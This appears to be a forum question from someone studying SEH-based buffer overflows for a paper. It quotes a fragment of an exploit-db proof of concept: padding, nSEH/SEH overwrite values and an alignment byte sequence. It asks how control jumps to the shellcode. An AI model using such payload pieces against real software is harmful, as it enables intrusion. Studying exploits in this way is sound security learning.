# What is this "prepare" variable used for in this SEH based buffer overflow payload?

Tags: vulnerability, buffer-overflow

I am trying to understand how a SEH based buffer overflow is working and I have to write a paper about how an exploit works. I took [this PoC](https://www.exploit-db.com/exploits/46673) for my paper.

```
junk = "\x41" * 4091

nseh = "\x61\x62"
seh  = "\x57\x42"           # Overwrite Seh # 0x00420057 : {pivot 8}

prepare =  "\x44\x6e\x53\x6e\x58\x6e\x05"
prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3"
prepare += "\x41" * 107;
...
```

I don't really understand how it's jumping over the next `SEH`.

- What is `\x61\x62` used for in the `nseh` variable?
- What is the prepare variable used for?
- How is it jumping to the shellcode?

I already understand that the `\x57\x42` is used as a pointer to target a `pop pop ret` to trigger a second error but I am stuck after that...